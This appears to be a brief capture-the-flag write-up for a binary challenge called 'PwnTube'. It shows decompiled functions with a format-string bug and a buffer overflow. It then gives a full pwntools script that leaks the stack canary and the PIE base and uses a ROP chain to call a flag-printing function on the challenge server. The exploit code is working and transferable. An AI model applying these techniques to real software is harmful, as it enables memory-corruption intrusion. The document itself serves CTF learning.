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| __int64 __fastcall showComments(__int64 a1, int a2) { __int64 result; unsigned int i;
clearScreen(); printLogo(); puts(aComments); for ( i = 0; ; ++i ) { result = i; if ( (int)i >= a2 ) break; printf((const char *)(30LL * (int)i + a1)); } return result; }
I can trigger FSB in showComments
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| int __fastcall addComment(__int64 a1, int *a2) { const char *v2; int result;
__isoc99_scanf("%7s", 30LL * *a2 + a1); }
I put FSB payload through the addComment
Finally, There is easy bof in buy_premium
, I tried to call skipAd
using ROP.
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| unsigned __int64 __fastcall skipAd(int a1, int a2) { char command[15]; unsigned __int64 v4;
v4 = __readfsqword(0x28u); clearScreen(); strcpy(command, "cat ./flag.txt"); if ( a1 == -559038737 && a2 == -17958194 ) { puts("\nYou did not give me up :)\nYou earned this:\n"); system(command); } else { system("cat ./flag"); } return v4 - __readfsqword(0x28u); }
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| from pwn import *
p = remote('pwntube.challs.srdnlen.it', 1661) e = ELF('./PwnTube')
pop_rdi = 0x15aa pop_rsi_rdi = 0x15a9 ret = 0x1016
p.sendlineafter('──', b'4') p.sendlineafter(':', b'%71$p') p.sendlineafter('──', b'3') p.recvuntil(':D\n') canary = int(p.recvline().strip(), 16) info('canary : ' + hex(canary))
p.sendlineafter('──', b'4') p.sendlineafter(':', b'%55$p') p.sendlineafter('──', b'3') p.recvuntil(':D\n') p.recvline() pie_base = int(p.recvline().strip(), 16) - 0x176b info('pie : ' + hex(pie_base))
p.sendlineafter('──', b'777') p.sendlineafter('──', b'5') p.sendlineafter('b', b'2')
payload = b'' payload += b'a' * 504 payload += p64(canary) payload += b'b' * 8 payload += p64(pie_base + pop_rsi_rdi) payload += p64(0xFEEDFACE) payload += p64(0xDEADBEEF) payload += p64(pie_base + 0x12A6)
p.sendlineafter(':', payload) p.sendlineafter(':', b'sadf')